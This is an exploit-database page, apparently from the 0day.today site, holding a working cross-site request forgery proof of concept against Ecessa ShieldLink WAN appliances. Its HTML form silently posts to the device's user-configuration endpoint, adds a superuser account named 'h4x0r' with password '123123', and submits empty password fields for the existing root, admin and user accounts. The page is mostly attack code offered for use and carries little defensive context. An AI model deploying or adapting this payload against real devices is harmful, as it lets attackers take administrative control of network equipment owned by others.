[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser) Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Low
]
0day-ID
0day-ID-30630
Category
web applications
Date add
25-06-2018
Platform
hardware
# Exploit Title: Ecessa ShieldLink SL175EHQ 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
 
# Summary: Ecessa's ShieldLink 60, 175, 600,1200 & 4000 are advanced, yet highly
# affordable secure WAN Optimization Controllers that incorporate all of the ISP/WAN
# link.
 
# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.
 
<html>
  <body>
    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="user_username1" value="root" />
      <input type="hidden" name="user_enabled1" value="on" />
      <input type="hidden" name="user_passwd1" value="" />
      <input type="hidden" name="user_passwd_verify1" value="" />
      <input type="hidden" name="user_delete1" value="" />
      <input type="hidden" name="user_username2" value="admin" />
      <input type="hidden" name="user_passwd2" value="" />
      <input type="hidden" name="user_passwd_verify2" value="" />
      <input type="hidden" name="user_delete2" value="" />
      <input type="hidden" name="user_username3" value="user" />
      <input type="hidden" name="user_enabled3" value="on" />
      <input type="hidden" name="user_passwd3" value="" />
      <input type="hidden" name="user_passwd_verify3" value="" />
      <input type="hidden" name="user_delete3" value="" />
      <input type="hidden" name="user_username4" value="h4x0r" />
      <input type="hidden" name="user_enabled4" value="on" />
      <input type="hidden" name="user_superuser4" value="on" />
      <input type="hidden" name="user_passwd4" value="123123" />
      <input type="hidden" name="user_passwd_verify4" value="123123" />
      <input type="hidden" name="users_num" value="4" />
      <input type="hidden" name="page" value="util_configlogin" />
      <input type="hidden" name="val_requested_page" value="user_accounts" />
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="page_uuid" value="df220e51-db68-492e-a745-d14adfd2f4fb" />
      <input type="hidden" name="form_has_changed" value="1" />
      <input type="submit" value="Supersize!" />
    </form>
  </body>
</html>

#  0day.today [2024-12-27]  #